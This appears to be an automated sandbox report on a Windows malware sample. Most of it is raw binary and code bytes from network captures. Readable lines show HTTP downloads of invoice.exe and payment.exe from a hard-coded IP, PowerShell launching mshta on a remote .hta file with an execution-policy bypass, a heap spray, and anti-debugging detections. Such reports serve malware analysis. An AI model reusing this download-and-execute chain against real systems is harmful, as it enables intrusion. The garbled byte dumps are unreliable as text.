)tÎWÛzØ7¶x½Å©þi; S=Eäg!øtNmÜÜ4ra:uìØ/¸ ±?Pç3ShÒtMúòÒù ¡Î[ÏwÝeºÀüÉøãH:rÉËé3èÝ'zïñ6îSø²¼$'-åºø7Fª(W÷jr´ÅÜùw¦ìÖ u_¼ñú÷ ±ª,u-sT³ø6ϵã4> éPlÂ>&Pç¨Ãà:L¸Û¶ ¿(!<È8w'ß´ý¿àà+O\ÿÕj~Ó~üÐÏ夳aý ÇAüMè?ñ¿ûV,W_&öJ½öé/úm¶x Çr¦®c0ÎýÂäAdbòLIyòø ÏBPù¢þfBBLc È¡ÉHÎánHõN&gô9 |
Data received | dapenec kehamobab feto pegasikuy. Gosijezomotuha nivaceroj xulu vunoviliyuke jeyexokarun. Zahebiwefayiro kamusarasav lejoviz dabifuninimuxep. Winucofofoz dunezo zamoxonuga. Samutaxeroma cabetedicacova. Dobatuleroki kukobeditezeze zahuwegicaxa hovebiyiwevexir. Wewonuxo ris noyiwokakujixix cejozixew zihomamu. Habirofideheni cakafeyufuvad sozovew pehoruwodikeguf. Jolokomezoyed vevu yijocazeg jixuregipik. Yufoj tewudimoxuh subiyay kihafejevosan. Hos sanap vununipugap. Yirenumohujop zekosapivud jepihaganebih pumefapokituxi. Kixey zidexev. Xomemuka xitejeba. Hob fuputojuyaz. Vebidahakolupas cotokihitiju puguharu. Cote hehacak. Ferukemoxov cowezada yepiwoxih. Xemeb civirameveweho. Gimedoriduwas sinibey waxugibu yasateviminovog maposagatow. Wofironixisu seteyumoji gem hitudazow yoyomep. Xexez. Bulak xuceve vojivum revomofukeguka. Migarace pixebidox. Poguda xanajodobug. Jihisatufotolef rujaxejovuxeyu. Tayam rayocujicoha hecuti teceyo. Darebakac sojatix. Niholusuka. Vizeniyu goladul. Tututidi rorigogim yinerahit. Yihemal tageguvojuleni. Lowubozit mapofehemij muluyafucecajig kotekiy. Teruxijutaman bijiparafoyulu felovulavokobu mel rulizojo. Fohijugayutixoy suhibuhebaga ricovodoragipu. Luhawinigeli sasuvilabu dapajik. Godebenowu fimipunudes cujalohuhagog gac jepitezoveba. Hadarafumob guba luwokoduy lodoce lucoxon. Poviwecananute bewesadafix hudak tigupivurasegew luvilizikiw. Wejac bosolefu merosamehavuy tiy lazix. Pacimu til ravuyuxox disapotuma. Gifaxeyaduva jawum. Vowusicesa yahanepunida wirihuxewugubo firecu rekifegefemimi. Belininecukule sasizetayafeku. Zarazunilenu. Fedagojejezo vig cikisi ramufolob. Kolevof ripakegupini mufimojedatid. Layuwibico sumucivakebeb wuciyiniy fakanajulakub. Latozulu. Degavom ridacaluhe tuxejiyuzaf votu voxa. Zuwevatayitafum socamerah zex. Voxufocuhikape sama. Vagim. Davalaxoy kenumewi hac. Kibolacivov xerepole. Zegaviv. Reku rocayig movusufapamerix bohihayuve wotofimax. Cuzifigid pamefo pinatezominesi botava zibeseku. Xedehacoziyon. Sibafanenowiku xilagok. Zuwab. Mezatuwu tebuget mulapohakil. Faze dosizuw zohofajovuy kevogi. Cuzehogoc vis ricitow bab momumolihit. Gubehago hiwaci facajaruzeluk guyine gahonuz. Tuzirege. Dapiyipugezet pijipohopul sowowajaheg. Tid. Nocilerim. Casabaced. Tozoguxukecucar. Suvox tijiz nudalonizotaxid defimumakay. Cenosutawuwi legozeyu hugoza. Fahozerebiraz jujibusikedukok volufuzokexo sikoculinilem fozunopitiv. Gunelipuk. Nej gusucexiduhic. Vuluzegeporey bekuseh hodupuzowowus hetoderica. Gin. Jubumijivoc. Donepidaveci xuheseziguzi cuxos. Nadel segox yabepay xuwiref. Gaxofuseyiy tak. Wahiwubulubah fanawaf yit. Yotoyidatalag muhe vuhalocec. Lulitojoxeyuh. Celawacevacafik pavolujanep casud foluz fisuma. Xawamib hawukafavufobac yixoyeriboxu latitino. Yogivojugofetez. Tovuboy. Conudosuruyiyit zisuri fewu logevacemo cucufaxojevo. Jadedohilupaho bopoz sButo zamazezebav josuradasiyeke. Mococ. Muzoker higiluhumolujol fejof cab zarujuwukafozoc. Topupofarukuv tugihiyuzesazu rogeyotewuj nehucafeyotodok. Lubalifalumo sijuwik cutirire jifanifepi diwuje. Mezuz dawaketezoz. Mazeboyidamaz lezagenikecu pakusevi lupur wumimeg. Wosojib temimoxavaruseb nojamoduwufi pevimamugirulu buyasacowozok. Zewolutofupeh sohoxekorise jacatiyasiw yayinazokam lawup. Gevuyanal negizayonarob. Vexedasudecifik. Makohota yetopidiseti. Tavive yetuniso gohavifeli mamewute. Xumazafulofaxit lixubigecaku zikivozuromon. Wakivo. Bocebujoxi zizudaxipodis xurutigasiwo lazoyiyij. Razumiliyuru. Voyigizosumi nokovatoyu gopenuyoke. Jakiv bozuriz fayoyi. Kemayofux zuhu lum fuze vamuhurirug. Gadob sayubul. Nutovayiho n |
Data received | ÃUìESVW}Ù9Gsè¹wE+ð9usuË;ßujÿðVè~ÿuËjèrëCjVèóÀt7rëÇKùrCëCUVúWQPè¦ôÿÿÄVËè_^Ã[]ÂD$VñP@Éuù+ÂPÿt$Îè^Â|$Vñt+~r%|$FW8vÿt$WjPèEôÿÿÄWè Y_ÿt$ÎÇFè)^Â|$t(~r"|$FW8v WjPD$èWèP Y_L$ÆÇFèåÂUìVW}WñèäÀt~rFëFÿu+øWVÎèþÿÿë:jÿuÎè¿Àt(NùrFëFÿuWQPèóÿÿÄÿuÎèwÆ_^]ÂUìVW}ñ9~sèF+Ç;EsE}v@NSVùrëÚùr+Eß]PS+ÏQ×Rè5óÿÿF+EÄPÎè [_Æ^]ÂyD$ArIëÁÆÂVW|$ñÿþvèF9~s ÿvÎWèÛë-|$tÿsF;øsÇPjÎè1þÿÿë ÿuWÎèÿÿÿ3À;ÇÀ_÷Ø^ÂVSW^úrë˸,sA;Èw4úrëË~y;ÈvúrëËÿt$Ø+ÙÑûVÆèë2|$ÆèüÀt!Førh,sAPSÇè)ÏÆèÆ_[ÂxHr@ëÀ3ÒfHø/AèsìSVuWÎùeð}èþþvuë%3ÒjÆ[÷óOMìÑmìUì;ÂsjþX+Â;Èw4 eüFPÏè¢MüÿØë0EMèE@eðPÆEüèEìÇEü¸Ò@Ã}èu]ì}vrGëGÿuPFPSè0ñÿÿÄjjÏè³üÿÿÿuÏ_wèþÿÿMô_^d [ÉÂMè3öVjè üÿÿVVèÛÌ|$Vt-qAþrëÐ9T$rþrIÈ;L$v°ë2À^ÂUìVðW9^sèM~+û9}s}E;ÆujÿûðèåS3ÿèÝë@èDÀt7~rFëFuVúrNëNXPRQÇè[ÏÆè9þÿÿE_^]ÂVðÿþÿÿvèF;ÇsÿvWVèìë ÿu!~ørvëÆ3Àf3À;ÇÀ÷Ø^ÃUìMì Éw 3ÉQèYÉÂÈÿ3Ò÷ñøséeEPMôè¤hhAEôPÇEô2AèÌUìQQ9~sè:F+Ç;EsE}vSNSVùr]üëUüùr]+ÃÀPUøUüBPEø+ÏÉQxPè»NÄ+ËÆè*ýÿÿ[ÆÉ¸¡/Aè® QQSVuW}Ïeðÿþÿÿv}ë'3ÒjÇ[÷óNMìÑmìUì;Âs¸þÿÿ+Â;Èw< eüOèMüÿØë.EHeðEÆEüèzEìÇEü¸!@Ãu}]ì}v~rFëFPGPESèjjèAúÿÿMÆ^~è |
Data received | WüÿÿMô_^d [ÉÂu3ÿWjèúÿÿWWèÌUìì Éw3É PèaYÉÃÈÿ3Ò÷ñøsèeüEüPMðèíhhAEðPÇEð2AèÔÌÀPÿt$D$ÀPÿt$è[D$ÄÂVÿt$ñèÇ2AÆ^Âj¸ø.AèÝñuðèwÿueüNÇ2AèfÆè Ây$rAÃAÃÿVñjjNÇ2AèãøÿÿÎ^é ÿUìVñèÔÿÿÿöEtVèYÆ^]ÂÿUìVÿuñèmÿÿÿÇ(2AÆ^]ÂÇ(2AéÿÿÿÿUìVñÇ(2Aè ÿÿÿöEtVè;YÆ^]ÂÿUìVÿuñèÿÿÿÇ42AÆ^]ÂÇ42AéIÿÿÿÿUìVñÇ42Aè6ÿÿÿöEtVèìYÆ^]ÂjD¸/Aè¼h<2AMØè÷ÿÿeüEØPM°è9ÿÿÿhÄwAE°PèBÌjD¸>/AèhL2AMØèàöÿÿeüEØPM°èPÿÿÿhHxAE°Pè ÌÿUìVñjÇFèùÿÿjÿjÿuÎèÓöÿÿÆ^]Âj¸a/Aè!ñuð}Wè8eüÇWNÇ2Aè¥ÿÿÿÆè_ÂÿUìVÿuñè¶ÿÿÿÇ(2AÆ^]ÂÿUìVÿuñèÿÿÿÇ42AÆ^]ÂÿUìEVW3ÿ;ÇtG9}uè)j^0WWWWWè²ÄÆë)9}tà9Esèj"Yñë×PÿuÿuèëÄ3À_^]ÃÁ``Çh2AÃÿUìS]VWùÇh2A Àt&PèRðFVèxYYG Àtÿ3VPèäÄëgÇGÇ_^[]ÂÿUìÁMÇh2A `H]ÂÿUìS]VñÇh2ACF ÀCWt1 Àt'Pè× øGWèýYYF ÀtÿsWPèhÄë fëF_Æ^[]ÂyÇh2At ÿqè¥YÃA Àu¸p2AÃÿUìVñèÐÿÿÿöEtVè^YÆ^]ÂÿUìQeüVEüPÿuÿuèéðÄ öu9Eütè Àt èMüÆ^ÉÃjhàxAèH&eäu;5Hw"jè;YeüVèB#YEäÇEüþÿÿÿè EäèT&Ãjè6YÃÿUìVuþà¡SW=0A=HuèØ,jè&+hÿèh(YY¡ø~Høu ötÆë3À@PëøuVèSÿÿÿY Àu öuFÆæðVjÿ5Hÿר Ûu.j^9ð"Htÿuè¶,Y Àtué{ÿÿÿè0è0_Ã[ëVè,YèvÇ3À^]ÃÿUìj jÿuèK/Ä]ÃÿUì]éßÿÿÿjhyAè%3Û]ä3À};ûÀ;Ãuè&ÇSSSSSè®Ä3Àëy3Àu;óÀ;ÃtÖ3À8À;ÃtËè3E;Ãu èåÇëÊ]ü8u èÑÇjþEðPhAè4Äë£PÿuVWè|0ÄEäÇEüþÿÿÿè Eäè¦$Ãÿuèî/YÃÿUìVW}3ö;þuèqj_VVVVV8èúÄÇë$hÿuÿuèÿÿÿÄ;Æt3Àëè9_^]Ãjh yAè÷#3À3ö9uÀ;ÆuèÇVVVVVèÄÈÿë_è.j [ÃPjè/YYuüèü-ÃPèÿ4YøEPVÿuèä-ÃPè]6EäèÔ-ÃPWèr5ÄÇEüþÿÿÿè Eäè#Ãè®-À Pjè)/YYáAÈ3É9 HÁÁÃÿUì]éÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ=ÀnHì®\$D$%=uÙ<$f$fàfød$uUéyA=ÀnHt2ì®\$D$%=uÙ<$f$fàfød$ué%AìÝ$èâFè ÄÃT$èFRÙ<$t6f<$tÙ-:AÙèÙó=#H ÀFº pAé½Fè9Fë&©ÿÿuò|$uëÝØÛ-A©t¿Ùà뻸=#H vFº pAèoGZÃÿUìVuW3ÿ;÷u3Àëe9}uèj^0WWWWWè¥ÄÆëE9}t9urVÿuÿuèìGÄëÁÿuWÿuè[GÄ9}t¶9usèÍj"YñëjX_^]ÃÿUììSW}3Û;ûu è¥SSSSSÇè-ÄÈÿéfWèN9_YEü}_jSPèMÄ;ÃEø|ÓW÷Âu+Gé.OVð+ñuôöÂtAUüuüÁúÀmHæÁæöD2tÑ;Ðsð: uÿEô3ÛB;Örñ9]øuEôéÚÒxïèöÇéöG´W;Óu]ôé¥]üuü+ÁÂÁûæÀmHEÁæöD0tyjjÿuüèÊLÄ;Eøu GMÈë 8 uÿE@;Áró÷G ë@jÿuøÿuüèLÄ À}Èÿë:¸9EwOöÁt÷ÁtGEöD0tÿEE)EøEôMøÁ^_[ÉÃjh@yAèä3À3ö9uÀ;ÆuèÇVVVVVèÄÈÿë'ÿuèÔ*YuüÿuèþÿÿYEäÇEüþÿÿÿè EäèÒÃÿuè |
Data received | i callsig' delete[] new[]`local vftable constructor closure'`local vftable'`RTTI`EH`udt returning'`copy constructor closure'`eh vector vbase constructor iterator'`eh vector destructor iterator'`eh vector constructor iterator'`virtual displacement map'`vector vbase constructor iterator'`vector destructor iterator'`vector constructor iterator'`scalar deleting destructor'`default constructor closure'`vector deleting destructor'`vbase destructor'`string'`local static guard'`typeof'`vcall'`vbtable'`vftable'^=|=&=<<=>>=%=/=-=+=*=||&&|^~(),>=><=<%/->*&+---++*->operator[]!===!<<>> delete new__unaligned__restrict__ptr64__clrcall__fastcall__thiscall__stdcall__pascal__cdecl__based(dA|dApdAddAXdALdA@dA8dA,dA dAXDAd_AH_A4_A_Aø^AdAdAxEAdAdAdAdAücAøcAìcAècAäcAàcAÜcAØcAÔcAÐcAÌcAÈcAÄcAÀcA¼cA¸cA´cA°cA¬cA¨cA¤cA cAcAcAcAcAcAcAcAcA|cAxcAtcApcAdcAXcAPcADcA,cA cAcAìbAÌbA¬bAbAlbAHbA,bAbAèaAÀaA¤aAaAaAaAxaATaALaA@aA0aAaAô`AÌ`A¤`A|`AP`A4`A`Aì_AÀ_A_Ax_AXDA ((((( H h(((( H H ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖרÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖרÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúû |
Data received | à«ßÚiq>ÉÇØ!SFئ#T(hë%ÝûææëÑXªúÎsü2o£kÈ 3I|%ë¨#XoáB55ÃYOc ß|+çÞ¢6ÊxÜ¥æÚ¦ùÐúþ쥤6êÚº~@:gÎ_çl5«À|<Äð%öõq<YMñ¤ÌÖLv¼¾mOãjá©äÚÚ ÜøºûÞáÍG±³?Lx¸-"IÔ+ýÉ5£Ç;p¤?B*°xä^w8±¢&óì~J÷i5´_ [í±Pa>eº!úQæÕg:W·óZ1AÿL¡«ÍEüëNܸp1·É)¯ºX-øÚr>GË5O`äÍma¾¡{©(¤(«!ëØsÛ®J=¸ÎØÃÆ÷¿>TéÍ4 °í!Zèå¯Á°et<»º,XÛÒ7K6/.r±#ièc/f¢8´£WH¸Õ!¯#R/|}Ôdö4JDÄã Õ+ î´°)*þJç-ÏüQãrÊâøýÔ&íHeÂa!\ÆV vûü§=ä>Ôf]z3iT¨(» <Cp¿Qñ5EöÛ µ¸¥26KhXñâG@5 l8m¤P«×ë´µPMÑ14I¦Êå£x@ £º2´çÃ"°Ï¾Ý2fd lÛ0ß\¿$3[F+.~@¸ÁÙDcdqW£4HßÛàÛ¤?_£äJõ$ÐÌîJ>2¹B¨âÅÏMHJ:¡Õ u:§q[Öeò+P0íö¨E± ¾*Îþ¾Ø.µ^W,;±Òy¿Ò{S \r¼êø¤·8ûwD¸UP İ2ÿIâÎìáYãqÑÛD×jç±ZlæG°·PíÆJ¡°j1®îþUyFÿ>|~¡I ÑâUñ_Sä°!êÝr}ÖJ×cN¢Á YGnß{/9ÇeþbΤîey¸Zä05s÷hÞäÁ'Îå#d¡ 3çÌ8»C@ß½÷"Ó§Cq*óΪ°XªukIËîÒÔçë5ôí¿LäèNðë°¦2È]Åè¡Þü üÞ4!z¬p·ÈW ç>NRÆ >çQbçh sëüsIÁåN!×Ê3-÷t 0|">BCHÞÔBªlµeR#c¨'Ä5À1Ét-A:j¿ºÂë¾äê^Ñq¯êç2OH,H½2Þxä@YÊï 9îÍgæâx-@BwNb(6>*HÝkÛw}1¾;3þ(_E7e,ÁE>¦vlÕy®æM?ÏHÄ.·:q¤êaÛñK¶{(%±h}dÞ#l¾SÓmj¦H<ÿ11Üæ E¹¡¿u(Æ&ÃRu¨ôzöI/9èIëu;nñó!2=½ö2"{ÈÿhLÂËZº%2H<GRÁ\»¿åMèm¨=`ï.*×äó3uh¡}³2'£Vû-eñ3Ò¨î±K=gÑÈã,¨*4.Õ®x½õîÛjt,m¬ÛÎú¯½å×=U³ú´@þR Ò=+Ðl`ظ ùmk!ùÙ[c9®ªè73Rs?Ì¥MåUºs]öÏ®Ù=¿²]wê1áL~J¶ñQ¥¦+$}±¤hC&.EqT×ÔRãæ:fà¨M*ã¹+Éã§ìÁ³ÓUÃÝfu_iv°zÞp :kôfµËøÇAó_s5·>?©o"GÇ2¦ÊÈÖ-y9ÅT» âçöß5Q×û^W¦FÈ$·ZuG»F7¢ýÖ³îZÉ)|ÂË&÷Á§üK¼2ãííXÅH°HGÝZ®1º=xÉÄ·.y2¨6å¨tð§çØè+º=#"Tu'ÏÊ6) 3¿´C¥=à@¾[0vùuß1¶ßdøRgLOd û¨[ÚuZ®Ú¸^ÃJ 1ÓÁA#ÆÍ \µé̪B0U¹«píï - ļæî Ã¥«fñp7Mk,«À©Hä)Ô_73úq½0#aizoÖ%»Â¶xWMhfMÂúvlyP8ûµê°cM~¤ÂJyÞiÚr4l)SPÐÂR.ÀºÚã=÷ÔÔÌ]©o¿¥¸3½7PÉn%¦Xí`ø.bá¿¢m|½ÍÛ=c7?_ùë#Ð4q%Ô@.;4¢)AàV/y]\æéÅf7qkÝÕ$ô|§$ WE¼ëfß2-¼)¨OìWë<¥×ÞøO*¥©Ç¿6â *h>ßܺÔlqÖö\º1×úÅ1¿»5:s$óʼá¦é^hHàØ×NÄ¥xñçgjç%>ïÏìúDW'âý Ë£ÿóý§äI¦edâ«mèÚø~æærq9¼6wï仯HYþø§Cþc¢aq÷E/jE±¢) »RVN+&öΧdÕi'¯k1¤ö¤8ìa±¶FhúGÞßD¬÷ù4 µ5ÿ+ÕÅmúÍ=i¤û±Â5öÝJxíViÑ#I¼×¯7Ý÷\ñéâ6~åõ"+QákAxxD$ì Å 5Æ»?:Âõ®.ö-*c¯*lÛ°"ü< ´5Q8AíëO<tµó#ORì^Y9Ù"O'B/Ì·¾,8åXÕþÂö\;íÎg¬l©ep(B¦¢úlüª(´ÎÎ.öÆA§bcÖÝ$R_O;|§Â¨ VºÚDÛÚ°æÆçÚDÄÊ$^ÃZ·ÿûgs¿==²zì¿Ù/q£²H oRL·ÕNã¾÷Á¢ÀÁs¡Å>!ÞQÛ{V`QÚT"$] ¸¨0}à8ðG¹>h)oÖ¶bQ'=^Îõüs*Èd´Ç&ÈÓæ]hïC#/ÉK= ÒÜ$¶ï ïçªè|¾Ð4¤¢X|iÓ?§BS UTK4W$PÄñ=uíéôêÞÙC<©¯Î¢kÛ,o©PðÛ|^©a0Î hD dø£©&Sþûj,±Ê7¶ !)ºçé~fÐêÀôI(îÝ à~FX ~6ñ|T\Emßë¹URoFFÚK8Þvþ ]Hy_ñZæè aà5ihÎÛñ¶éÅ0dÖ8ö§qJ3³Ê®ûÐq¯ÜvaÊuØÊË{ï;á EñÖ;³?³1\Äɧ6Ì'LLX4tÅÂgZpÕNBn;kÓôRU{ x(ç¾Úó$¨ëeeN¡a:xü&»?v2Æzê¦ÿRlKpiÞmÁZr8SEëzñD&÷ü45ñ/ÓåвçY¯un Ǿa]¤Ó{³OxuLáèoÍvKË3¼¹`'ÞÆÝû[¯E¢Õߦê. ÉÇjµûé½Åz,Ïäì~&¶Î Èd:6ÐSL;çápciBówÇL1dHÊÛàØiÆóÙÕ¢oÎg" |
Data received | ìti:F?Vð/ øé: Ýä¨8Ü%ëuÍ×ÑeíÌk÷¢ÆPeIö4êÈíkH[`ÄÃÝðD`+q óäÖýR¤=ÊÙ"=3T£SknàK Õ;¹vj¿á©ïð±GÑ讯P*«oűHÛF/Bpf2f¦Õé~²¤kqvèÂS+O×Î#éÈc¦ÐWùà8êT®¸T}DB °8SCòTÇ~êð,`?þ¦aè?ÄÞ¤ÂáT¯Á¯F ¡Z?ðO÷(ÙlÊã$æ°O¤¼8þ ÿdL°ánÜ®zzYn\Ý{-³;®hKX^9èC ksæ¸]ß5 vÓ7ëOì©Ò3õ=$ãG VÛÙ »^ýRpf¿þj `d[ î¤%Ò%nîÜ}ºôÜ)ç`KUP&B!;·~ÍõkÑÂJÖ8Dâß)âR60\µ3lê0t¥13§Å1k¶Ò¹(ɸõ` m¨ÀMC²þB 'OvcϬ¿¯ $ô%½¬¼³Ärg/b{e ±>Tò/y%·¾MÎ}2¶4 H¡îE#á® -çúfXÙ_»ò]¶1¯r9¶ {kß«~¾íw 4ÄwþVÒLàÆ@F À`ÈßÜ6_RBMUÌÓ½³Q½£í|©+úBJ£\3ç`g¥>½Câzé$óðàÊaU&R!¾YrÞz×¾Ê-¦àËK#ѵÕA9Îj£·¡Øåy!'#WD¡LáW4©ÃëØ³optwå%VÄ $kQÑÓÍÿÛumtµ9G°Ø_{ýL6×Ö ?D2JñW¢èdý 3WÓ£¯å»¦r*´Xiæ\)íä;3Hç(í¾ùÿC*ß1ÅÑAz¡ØÞ=è 8xºh7Ln¬Ûdç¼uÓ²a«Íõo/=`º»ÍÛ_oZÔGõj|KzÑ4r¥*G' ¨lÏeNéN®´Ó£mí£aup&ÄÞªäö¼ Ö¾[+géuºbÌÕ3׫w#%FZäʯtI;&Ä Ýâ1èuÒ8Ê@¥0à5n`*òéTðÅQ7b!æ @µ;{5,¾äT(PSàÑlÐÌîÜÝTêÀ·å=ÅÖh»ÍVá<¡¤FÂEMláäÎvIßh3£M´&úy"M]!¬P.LnOÃ0_À»Ií ÈÃrÑTÞYþ[©©ÿçgö S(ò¹UûnDhvÕsø).ø{Ë.É·1§Õùújâeb"¤(hÌÜSb/°Ó9rå |¦æ5£Æd÷¬9#µÇÞòÃw í§_ qïP7¶rdxVXdµk¨¬2¬ DzWj¸Dþu uÞðß¾AÔ463Óuw*r&úµÖÕÃßTUJºï /µóK:_ØÇcÃ6wæ%ß:~R±~,.ÒMé¿5/ì þ?Ât98 °³Y7tã3jDÏUæmÚ_t\¨:MûÔ/Ý^ÛýU5ê!âØpw,f¾!A!5fA=dº;*®WåþÁ v´Rz,#</§øçÕß S2uCÏ»ó]Ǫ)èÞ:êk%ST0È(w\ôÿ·ôó=züêGRìÌçØ»ãÔ¦hÒÔ½LË<¡é_ ÁgpeÜ :s˽ÁÇU]§_[¥TùëíkÄ?N 2AõÝ·ÞY2¨z! |
Data sent | GET /hhfm/invoice.exe HTTP/1.1 Host: 179.43.187.183 Connection: Keep-Alive |
Data sent | GET /hhfm/payment.exe HTTP/1.1 Host: 179.43.187.183 |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
host | 179.43.187.183 |
file | C:\Users\test22\AppData\Roaming\invoice.exe |
file | C:\Users\test22\AppData\Roaming\payment.exe |
count | 2316 | name | heapspray | process | powershell.exe | total_mb | 144 | length | 65536 | protection | PAGE_READWRITE |
parent_process | powershell.exe | martian_process | "C:\Windows\system32\mshta.exe" http://179.43.187.183/hhfm/invoice.hta | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\invoice.exe | ||||||
parent_process | powershell.exe | martian_process | "C:\Users\test22\AppData\Roaming\invoice.exe" | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\payment.exe | ||||||
parent_process | powershell.exe | martian_process | "C:\Users\test22\AppData\Roaming\payment.exe" |
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
file | C:\Windows\System32\mshta.exe |
file | C:\Users\test22\AppData\Roaming\invoice.exe |
file | C:\Users\test22\AppData\Roaming\payment.exe |